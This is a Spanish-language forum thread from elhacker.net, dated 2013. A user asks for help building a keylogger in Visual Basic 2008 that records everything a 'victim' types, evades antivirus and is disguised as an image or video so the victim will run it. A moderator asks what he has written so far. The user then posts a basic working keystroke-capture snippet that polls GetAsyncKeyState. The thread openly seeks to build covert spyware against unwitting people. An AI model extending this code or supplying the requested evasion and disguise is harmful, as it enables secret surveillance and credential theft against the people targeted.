elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Quiero crear un Keylogger en VB 2008
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Quiero crear un Keylogger en VB 2008  (Leído 3,328 veces)
Brift

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Quiero crear un Keylogger en VB 2008
« en: 23 Diciembre 2013, 20:38 pm »

Hola a todos!
Miren, soy nuevo en esto de programación en VB y estoy empezando a averiguar mas sobre esto de los keyloggers, para que sirven, como funcionan etc. Me gustaría crear un Keylogger en Visual Basic 2008 (La versión que tengo actualmente) en el cual pueda conocer todo lo que la persona o victima escriba en su PC. También me gustaría que no lo detecte ningún virus y poder disfrazarlo como una imagen o vídeo, para que así sea mas fácil de que la persona o victima lo ejecute.
No se si los conceptos que estoy usando sean los correctos, pero lo que pasa es que soy nuevo en programacion con VB.

Gracias.


En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Quiero crear un Keylogger en VB 2008
« Respuesta #1 en: 24 Diciembre 2013, 11:28 am »

Y que llevas programado por el momento? Imagino que tendrás alguna base o algo, no?

Postea lo que tengas y expón tus dudas o problemas que tengas a la hora de implementar una función

Saludos


En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Brift

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: Quiero crear un Keylogger en VB 2008
« Respuesta #2 en: 26 Diciembre 2013, 02:20 am »

Soy nuevo en VB, por lo tanto no se mucho de este lenguaje, por ende, no creo que tenga unas bases.

Código:
Public Class Form1
    Dim resultado As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        For i = 1 To 255
            resultado = 0
            resultado = GetAsyncKeyState(i)
            If resultado = -32767 Then
                RichTextBox1.Text = RichTextBox1.Text + Chr(i)
            End If
        Next i
    End Sub
End Class

Si a lo que te refieres es que empiece a leer manuales y a aprender mas de este lenguaje, claro que lo are, si es un requisito para hacer un keylogger. Gracias por tu respuesta.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
quiero crear un flash de intro
Diseño Gráfico
flipado_20 6 2,543 Último mensaje 4 Mayo 2004, 23:52 pm
por theskull
Como crear KeyLogger con Visual Basic?
Programación Visual Basic
Ivan 1982 6 19,139 Último mensaje 31 Mayo 2006, 15:23 pm
por Ivan 1982
crear tu propio keylogger
Programación Visual Basic
Mr pom0 1 7,238 Último mensaje 17 Abril 2007, 15:43 pm
por Mr pom0
Crear usuario en Windows 2008 server
Redes
Markwolf 1 5,317 Último mensaje 18 Agosto 2010, 15:03 pm
por l337*
¿Qué aplicación Hacking puedo crear con VB.NET y SQL Server 2008? « 1 2 »
.NET (C#, VB.NET, ASP)
bitorkos 11 8,660 Último mensaje 20 Agosto 2011, 07:14 am
por bitorkos
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines